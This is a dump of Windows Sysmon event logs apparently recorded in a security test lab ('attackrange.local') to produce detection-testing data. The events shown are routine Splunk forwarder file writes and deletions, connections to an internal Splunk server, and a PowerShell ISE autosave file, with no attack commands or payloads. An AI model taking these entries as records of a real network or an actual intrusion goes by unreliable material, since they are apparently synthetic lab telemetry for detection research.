12:16:34.177{8B6011A9-E4CD-6172-AAB2-01000000F101}9240C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4vcty0ms.tmp2021-10-22 16:22:32.4192021-11-12 12:16:34.174 11241100x800000000000000057345132Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:34.174{8B6011A9-E4CD-6172-AAB2-01000000F101}9240C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4vcty0ms.tmp2021-11-12 12:16:34.174 11241100x800000000000000057345139Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:35.856{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345138Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:35.856{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87AB2330467B393BCB1A39589D8EB219,SHA256=20A77742D6DA9548A0EBFE39463033C32BE007354AD569B83068B27953A168FEfalsetrue 23542300x800000000000000021219499Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:35.122{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB686A82FB9CCF03327AE8B8DE19581C,SHA256=AFBF7CFDBD0D140AD987BBD66CF29D1FA0B29385F7D58AC8C00C8438FDA17562,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345143Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:36.877{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345142Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:36.877{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD4BA800606D4439CAE984801DD8A2AB,SHA256=CA844E13E5362FD725260A0705DE389206255C0022CB8D9463174FABAB8F8919falsetrue 23542300x800000000000000021219500Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:36.185{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D7D05194424783291A1D9F170311947,SHA256=8CABB8842DFB6998F420160839EA112BD651240FDF38EBEB2203BCC19C05FD68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345141Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:36.377{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml2021-09-16 14:17:08.076 23542300x800000000000000057345140Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:36.377{8B6011A9-BB8A-618B-4CA0-04000000F101}7452NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=191BF671B22BB6D0D8098F4764225CD4,SHA256=587F0439BC6F77A0432866DC98383BB4980C713A6CBE1D9A500FD8BFA4A6C98Dfalsetrue 11241100x800000000000000057345149Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:37.892{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345148Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:37.892{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=578CE069CE48DEBB432D5EF713FA4A5B,SHA256=13B70F2EED0F92F051F741F53FA54ABF5EBACA940B2B5E175294B26DDE80377Ffalsetrue 23542300x800000000000000021219501Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:37.216{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=575C75558DB7A96412633EB046214FBA,SHA256=6E570E7AB1C67069D44FD3FBB0E50B6F5B3C8AC1EB922E23E676D704AF029DB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345147Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:37.376{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345146Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:37.376{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=658EE96801BDAF5EFD668D5EB2F5B067,SHA256=143BCF74A0E2FC5461179222A96FB178AF5EC1B28BA4FA0C4A813E304283D9CDfalsetrue 11241100x800000000000000057345145Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:37.375{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345144Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:37.374{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EA9E7A2DDF287305EF017674E828D4A,SHA256=5D4C2155E31A7CF5F6BA16D6409A778EBD45D792021B3CE973023926D51A7D17falsetrue 11241100x800000000000000057345152Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:38.922{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345151Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:38.922{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=280081B0F18C188EEC7C04AC1641391A,SHA256=DAE63C9DD3F6D45A62BFC6A44776F60E9DEF96C4B026031B4802BD890A130FA0falsetrue 23542300x800000000000000021219504Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:38.247{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79AE8DC7BF3D4CAE72D8BA45807FE794,SHA256=3A04162D2C6351AAB94F5A6AE6BB0AC746047D01DD8E0F09A76795451A6E448C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345150Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.708{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54533-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x800000000000000021219503Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:38.091{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15638288AD46F473F0EE212FBEBCAE12,SHA256=76C4E76904721C4A60C1B2A8CFC68B16A3D429CF24454B90416A92D6DE9F8CB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219502Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:38.091{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E4B36F7032F9E7E37FBEAEBDFE6AEC5,SHA256=50319FE1293AE6B16E03F0137D67E357FE07D27EBEF88E6403D0B91D629285AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345155Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:39.952{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345154Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:39.952{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FD47FA891B2109E59955EFA5ED95C4B,SHA256=38E2FD7C0B80224E2D7D7E536421D66F35BA3F4655CAB70C921913D3459889EAfalsetrue 23542300x800000000000000021219506Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:39.263{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25306039383F5FF046D050D0A2C22F84,SHA256=2EAD0C8BD6E135D5110F4A4A93A33405211B58BCC7190118BD56AF9A5B1154EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345153Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.407{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54534-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x800000000000000021219505Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:25.496{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64316-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345157Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:40.988{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345156Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:40.988{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5CFDF18CC4A91C5B5A6A8FD77080E4D,SHA256=94665268EAF5529A6D251A4D7A1149D04712BEEC116A1C390DFBDFCC58374150falsetrue 23542300x800000000000000021219507Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:40.278{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E520BC82F7C16A6F74721C3FCBF9CD1,SHA256=DD6962D707F764761E8A3196072F7EF1D8006B2C3B6EA9DFF1366C75268C47B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345159Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:41.989{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345158Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:41.989{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=157AFE84D9AF8DD50AF1B5CA3CB5127B,SHA256=75D8040250D1FEB48FB3C2BC235A54D14B9077F8C6CB8DEDA2FBF35F0BDE85FCfalsetrue 23542300x800000000000000021219508Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:41.294{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81CB39DA27FFC16A74E2EF939EACC2DE,SHA256=8F8976BCB44FE6846EE899C030725E6BBE7037CD2919B0FE5233234A39A4028D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219509Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:42.294{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC415DE25DABE140F3E4F397CB1F7415,SHA256=33128FADF933690B9CA3A587C9203B0C566C28735B48927EC84F970E06D43339,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219512Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:43.294{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3B14A128F8C70C48F5FC1BC4239290E,SHA256=28757E58A295A7540D6CBFABEF5A7A9E0C21A4CA2E2D636908931C889C7141D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345166Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:14.541{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54535-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345165Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:43.219{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345164Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:43.219{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=417BAA6C3AB57AA19F3E33ED5B6EA31F,SHA256=FAB5C332E1F7F99D8CED738FC1AABF72AEEAD905D11FA2236A64BE5EBDC57A5Cfalsetrue 11241100x800000000000000057345163Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:43.219{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345162Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:43.219{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=658EE96801BDAF5EFD668D5EB2F5B067,SHA256=143BCF74A0E2FC5461179222A96FB178AF5EC1B28BA4FA0C4A813E304283D9CDfalsetrue 11241100x800000000000000057345161Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:43.004{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345160Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:43.004{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE1BB3DB4416AA5E453498466005AFD1,SHA256=E3C6BE81ED2AA30C536943D80093200AB6A16CD0F1D261C72E1BEF7A4EDF8AA6falsetrue 23542300x800000000000000021219511Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:43.122{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5F0A262362BE6B3533B2B04062B631B,SHA256=8482660931A8D1C5B4392B849EE275F0D950E095CDC1D823F64CE81274B35F72,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219510Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:43.122{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15638288AD46F473F0EE212FBEBCAE12,SHA256=76C4E76904721C4A60C1B2A8CFC68B16A3D429CF24454B90416A92D6DE9F8CB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219514Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:44.325{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=162FBFDD0B700C490B144514CB0DA1B9,SHA256=C3332212551371C9629CF73D6EC9B9F0B09F1FF565C6EC172A00A3B274ACEF21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345168Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:44.006{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345167Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:44.006{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D97903B87420345BB947BE6159C34A31,SHA256=2F67AE8F6C968B4C997D323C5B479C24387E462EAAC452CE607AEEC3D0DE48EDfalsetrue 354300x800000000000000021219513Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:30.543{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64317-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219515Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:45.325{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3F8E3DF29C5DDCC9E54504152F41763,SHA256=500889938D011ACE22BEE248C56BBD99E2F901425055332130EA3FC998441FF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345170Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:45.022{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345169Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:45.022{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25433AF755B282EF7AA082EC1C2D1A51,SHA256=435A550E0639D47AE7867E54435B07EB98907F0781890F10403C054050334A34falsetrue 23542300x800000000000000021219516Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:46.325{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A5493A83B90BC4DCC909ADA96342F71,SHA256=919593E23DC29AB061C0946771566FB7AD557FB18B7F61097507C1482C3A8E7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345172Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:46.037{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345171Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:46.037{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A3BCFEBA6E9838E7B76F9F5F7891101,SHA256=84FED10C8D291AAB280E50875580837BBAD2B33D446A87E41B29AF62A40E9D83falsetrue 10341000x800000000000000021219539Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B8-6168-3F61-04000000F101}4464C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219538Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B8-6168-3F61-04000000F101}4464C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 